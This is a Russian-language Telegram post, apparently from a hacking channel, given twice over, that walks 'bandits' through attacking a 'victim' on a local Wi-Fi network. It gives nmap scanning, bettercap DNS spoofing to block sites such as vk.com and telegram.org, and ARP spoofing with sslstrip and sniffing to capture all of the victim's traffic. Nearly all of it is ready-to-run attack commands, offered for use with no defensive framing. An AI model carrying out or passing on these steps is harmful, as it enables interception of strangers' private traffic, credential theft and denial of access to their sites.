Forwarded From Теневой Комитет
https://telegra.ph/file/78de4f4081769f23f2184.jpgПерехват данных и блокировка доступа к сайтам по локальной сети.
Салам, бандиты. Сегодня мы будем перехватывать трафик и блокировать доступ к сайтам через локальную сеть. Сразу предупреждаю, способ не работает в Термукс. Я делал это на Линуксе.
Установка:
💲apt-get update
💲apt-get upgrade
💲apt -y install golang
💲apt -y install bettercap
Для начала нам надо узнать какие устройства подключены к Wi-FI:
💲nmap 192.168.1.1/24 (192.168.1.1 это айпи роуетра)/24 (это маска сети)
Запускаем Bettercap, с его помощью мы будем перехватывать данные и управлять сетью:
💲sudo bettercap
Блокируем сайты
Пишем через запятую сайты, которые хотим заблокировать:
💲set dns.spoof.domains m.vk.com, telegram.org, my.telegram.org
Указываем локальный IP жертвы который мы получили из сканирования NMAP:
💲set dns.spoof.address 192.168.1.5
dns.spoof on - START
После того, как мы запустили dns-spoof, жертва не сможет зайти на указанный вами сайт.
Просматриваем трафик жертвы
1. set http.proxy.sslstrip true
2. events.clear
3. set net.sniff.verbose false
4. set net.sniff.local true
5. set arp.spoof.targets IP жертвы
6. arp.spoof on
7. http.proxy on
8. net.sniff on
После этого у вас будут отображаться все пакеты жертвы ✌
https://telegra.ph/file/78de4f4081769f23f2184.jpgПерехват данных и блокировка доступа к сайтам по локальной сети.
Салам, бандиты. Сегодня мы будем перехватывать трафик и блокировать доступ к сайтам через локальную сеть. Сразу предупреждаю, способ не работает в Термукс. Я делал это на Линуксе.
Установка:
💲apt-get update
💲apt-get upgrade
💲apt -y install golang
💲apt -y install bettercap
Для начала нам надо узнать какие устройства подключены к Wi-FI:
💲nmap 192.168.1.1/24 (192.168.1.1 это айпи роуетра)/24 (это маска сети)
Запускаем Bettercap, с его помощью мы будем перехватывать данные и управлять сетью:
💲sudo bettercap
Блокируем сайты
Пишем через запятую сайты, которые хотим заблокировать:
💲set dns.spoof.domains m.vk.com, telegram.org, my.telegram.org
Указываем локальный IP жертвы который мы получили из сканирования NMAP:
💲set dns.spoof.address 192.168.1.5
dns.spoof on - START
После того, как мы запустили dns-spoof, жертва не сможет зайти на указанный вами сайт.
Просматриваем трафик жертвы
1. set http.proxy.sslstrip true
2. events.clear
3. set net.sniff.verbose false
4. set net.sniff.local true
5. set arp.spoof.targets IP жертвы
6. arp.spoof on
7. http.proxy on
8. net.sniff on
После этого у вас будут отображаться все пакеты жертвы ✌